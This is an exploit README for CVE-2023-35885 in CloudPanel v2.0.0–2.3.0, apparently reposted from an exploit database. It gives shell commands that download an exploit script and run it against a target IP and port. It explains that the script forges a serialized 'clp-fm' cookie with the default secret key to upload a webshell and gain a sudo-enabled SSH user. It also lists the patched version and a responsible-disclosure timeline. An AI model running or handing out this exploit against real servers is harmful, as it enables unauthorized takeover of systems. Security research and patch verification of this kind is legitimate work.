## https://sploitus.com/exploit?id=BCE99B28-1158-59D5-BB2F-4896DF10F673
# CVE-2023-35885
Cloudpanel 0-day Exploit

Author: @EagleTube, @Mzulfahmy, @farphalabs<br>
Github : https://github.com/datackmy/FallingSkies-CVE-2023-35885/blob/main/<br>
Affected version: v2.0.0 – v2.3.0<br>
Patched version: v2.3.1<br>
Vendor homepage: CloudPanel.io<br>
Product: CloudPanel<br>
References: [Write Up](https://www.datack.my/fallingskies-cloudpanel-0-day/)

Usage:
```shell
wget https://raw.githubusercontent.com/datackmy/FallingSkies-CVE-2023-35885/main/exploit2.py
chmod +x exploit2.py
python3 exploit2.py -T target_ip:target_port
```
# PROOF OF CONCEPT
Upload a webshell by injecting an encrypted "serialized" `clp-fm` cookie created with the default secret key.
<br><br>
<img src='Screenshots/firstrun.jpg'>

Shell uploaded by the automated Python script.
<br><br>
<img src='Screenshots/uploadedshell.jpg'>

SSH user with sudo privileges already granted.
<br><br>
<img src='Screenshots/rooted.jpg'>

## PATCH VERSION
CloudPanel v2.3.1

## SPECIAL THANKS & REFERENCE
1. Datack Sdn Bhd (full writeup) <a href="https://www.datack.my/fallingskies-cloudpanel-0-day/">datack.my</a>
2. Maui <a href="https://sabily.info">sabily.info</a>
3. Mohamad Zulfahmy (@mzulfahmy)
4. Farhan Phakhruddin (@farpha)

## TIMELINE
01-06-2023 – Exploit found<br>
12-06-2023 – Privately disclosed to vendor<br>
13-06-2023 – Submitted to CVE assignee<br>
19-06-2023 – CVE number assigned by MITRE<br>
20-06-2023 – Patch released by the vendor (v2.3.1)<br>
20-07-2023 – Exploit released to the public<br>